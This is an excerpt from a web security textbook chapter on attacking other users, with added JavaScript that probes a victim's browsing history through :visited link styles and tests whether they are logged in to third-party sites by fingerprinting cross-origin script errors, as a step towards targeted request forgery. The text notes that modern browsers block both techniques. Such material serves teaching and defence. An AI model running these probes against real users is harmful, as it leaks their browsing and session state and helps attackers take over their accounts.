The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws




Steal History and Search Queries

JavaScript can be used to perform a brute-force exercise to discover third-party sites recently visited by the user, and queries that they have performed on popular search engines. This can be done by dynamically creating hyperlinks for common web sites, and for common search queries, and using the getComputedStyle API to test whether the link is colorized as visited or not visited. A huge list of possible targets can be quickly checked with minimal impact on the user.

Note that this depends on the browser reporting the true rendered style of a :visited link. Modern browsers (Firefox from version 4, Chrome from version 9, and the others since) return the unvisited style from getComputedStyle for every link regardless of history, and restrict which properties a :visited rule may change, specifically to close this disclosure. The technique therefore works as described only against old browsers.
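The probe described above, written out as an added example (this is not code from the book). It is browser-side JavaScript: the document and getComputedStyle are taken as parameters so the same logic can be run against a stub DOM. The search-engine query endpoints are the real Google and Bing ones; the engine list, the site list, the query list and the control host unvisited-control.example are assumptions.

```javascript
// Added example, not from the book: brute-force history probing through the
// :visited style of dynamically created links. Browser-side code; the
// document and getComputedStyle are passed in as parameters so the logic can
// also be exercised against a stub DOM.

// Real query endpoints for two search engines; the engine list itself is an
// assumption, as are the site and query lists a caller supplies.
const SEARCH_ENGINES = {
  google: (q) => "https://www.google.com/search?q=" + encodeURIComponent(q),
  bing: (q) => "https://www.bing.com/search?q=" + encodeURIComponent(q),
};

// Candidate URLs: the front page of each common site, then one search-results
// URL per (engine, query) pair. Order is sites first, then engine by engine.
function buildTargets(sites, queries, engines = SEARCH_ENGINES) {
  const targets = sites.map((host) => "https://" + host + "/");
  for (const toUrl of Object.values(engines)) {
    for (const q of queries) targets.push(toUrl(q));
  }
  return targets;
}

// Probe each URL: create <a href=...>, attach it to the document (styles are
// only computed for attached elements), and compare its computed colour with
// a control link that cannot be in the history. Any link whose colour differs
// from the control is reported as visited.
function probeHistory(targets, doc, getStyle) {
  const holder = doc.createElement("div");
  holder.style.cssText = "position:absolute;left:-9999px;top:-9999px;";
  doc.body.appendChild(holder);

  // Baseline: a random URL on an (assumed) attacker-controlled host that the
  // victim has never visited, so its colour is the unvisited one.
  const control = doc.createElement("a");
  control.href = "https://unvisited-control.example/" + Math.random().toString(36).slice(2);
  holder.appendChild(control);
  const unvisitedColor = getStyle(control).color;

  const visited = [];
  for (const url of targets) {
    const link = doc.createElement("a");
    link.href = url;
    link.textContent = url;
    holder.appendChild(link);
    if (getStyle(link).color !== unvisitedColor) visited.push(url);
  }
  holder.remove(); // leave no trace in the page
  return visited;
}

// In a page: probeHistory(buildTargets(["www.example.com"], ["some query"]), document, getComputedStyle)
// Current browsers report the unvisited colour for every link, so there the
// result is always [] regardless of history.
```

The control link matters: hard-coding the "unvisited" colour would break as soon as the page's stylesheet restyles anchors, whereas comparing against a link that is certainly not in the history works under any stylesheet.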

Chapter 12: Attacking Other Users (page 396)



Enumerate Currently Used Applications

JavaScript can be used to determine whether the user is presently logged in to third-party web applications. Most applications contain protected pages that can be viewed only by logged-in users, such as a My Details page. If an unauthenticated user requests the page, she receives different content such as an error message or a redirection to the login.

This behavior can be leveraged to determine whether a user is logged in to a third-party application. The injected script can issue a request for the protected page to determine its state. A key constraint here, of course, is that although the script can make arbitrary requests, it cannot process the responses, due to the browser's same origin policy. However, recall that the same origin policy treats scripts themselves as code rather than data, and applications are allowed to load and execute scripts from a different domain. This provides enough of a toehold for an attacker to determine what state the protected page is in and, therefore, whether the user is logged in.

The trick is to attempt to dynamically load and execute the protected page as a piece of JavaScript:

window.onerror = fingerprint;



Of course, whatever state the protected page is in, it contains only HTML, so the browser raises a JavaScript error when it tries to parse it as a script. Crucially, the error delivered to the window.onerror handler carries a line number and error type that depend on the exact HTML document returned. The attacker can implement an error handler (in the fingerprint function) that checks for the line number and error type that arise when the user is logged in, values measured beforehand in a session the attacker controls. Despite the same origin restrictions, the attacker's script can thereby deduce what state the protected page is in.

Note that modern browsers close this channel. When a script loaded from another origin without CORS throws, window.onerror receives only the generic message "Script error." with an empty source and line number 0, so the line number and error type cannot be read. The technique works as described only on older browsers, or against a target that explicitly permits the attacker's origin via CORS.
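The fingerprint flow described above, written out as an added example (this is not code from the book). It is browser-side JavaScript; the window object is a parameter so the flow can be driven by a stub. The URL wahh-app.example/myaccount and the signature values are assumptions: an attacker records the real signature beforehand in a session they control, once logged in and once logged out. The example goes slightly beyond the text in that it also recognises the muted "Script error." report that current browsers produce, and classifies that as inconclusive.

```javascript
// Added example, not from the book: deciding whether the victim is logged in to
// a third-party application by loading its protected page as a script and
// fingerprinting the resulting error. Browser-side code; the window object is
// a parameter so the flow can be driven by a stub. PROTECTED_URL and the
// signature values are assumptions measured in advance by the attacker.

const PROTECTED_URL = "https://wahh-app.example/myaccount"; // hypothetical target
const LOGGED_IN_SIGNATURE = { message: "Unexpected token '<'", lineno: 1 }; // hypothetical, measured in advance

// Current browsers mute errors from cross-origin scripts loaded without CORS:
// window.onerror then sees only "Script error." with an empty source and line 0.
function isMutedReport(message, source, lineno) {
  return lineno === 0 && source === "" && /^Script error\.?$/.test(String(message));
}

// Compare one error report against the signature recorded for the logged-in state.
function classifyReport(message, source, lineno, signature) {
  if (isMutedReport(message, source, lineno)) return "inconclusive";
  const hit = String(message) === signature.message && lineno === signature.lineno;
  return hit ? "logged-in" : "logged-out";
}

// Install a temporary window.onerror, inject <script src=url>, and hand the
// classification to callback. Any pre-existing handler is restored afterwards
// and still receives errors that are not ours.
function probeLoginState(win, url, signature, callback) {
  const previous = win.onerror;
  let done = false;
  const finish = (state) => {
    if (done) return;
    done = true;
    win.onerror = previous;
    callback(state);
  };

  win.onerror = (message, source, lineno, colno, error) => {
    if (source === url || isMutedReport(message, source, lineno)) {
      finish(classifyReport(message, source, lineno, signature));
      return true; // suppress the browser's default error reporting
    }
    return previous ? previous(message, source, lineno, colno, error) : false;
  };

  const script = win.document.createElement("script");
  script.src = url;
  // A response that happens to parse as JavaScript raises no error at all.
  script.onload = () => finish("inconclusive");
  // Network failure, or the request was blocked before it reached the site.
  script.onerror = () => finish("unreachable");
  win.document.head.appendChild(script);
}

// In a page: probeLoginState(window, PROTECTED_URL, LOGGED_IN_SIGNATURE, (state) => { /* pick CSRF payload */ });
```

The parse error is reported to window.onerror during execution of the injected script, before the script element's load event fires, which is why the handler is installed before the element is appended and why the load handler only counts when no error arrived first.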

Having determined which popular third-party applications the user is presently logged in to, the attacker can then carry out highly focused cross-site request forgery attacks, to perform arbitrary actions within those applications in the security context of the compromised user (see the "Request Forgery" section, later in this chapter).



